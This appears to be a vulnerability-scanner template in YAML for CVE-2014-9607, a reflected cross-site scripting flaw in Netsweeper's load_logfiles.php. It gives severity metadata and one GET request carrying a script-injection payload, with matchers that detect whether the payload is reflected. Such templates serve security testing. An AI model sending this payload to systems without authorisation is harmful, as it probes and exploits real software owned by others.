51 lines
2.0 KiB
YAML
51 lines
2.0 KiB
YAML
id: CVE-2014-9607
|
|
|
|
info:
|
|
name: Netsweeper 4.0.4 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-9607
|
|
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2014-9607
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00102
|
|
epss-percentile: 0.41716
|
|
cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: netsweeper
|
|
product: netsweeper
|
|
tags: cve2014,cve,packetstorm,netsweeper,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100f8c58b7ce75987ee10d4a7a2dc87f86c3d65bd50843fac13a7b0d0641c1f20a00220570389114da5233ffcd4ccc05632c183ff57e6dc07babf80b21d2818decee813:922c64590222798bb761d5b6d8e72950 |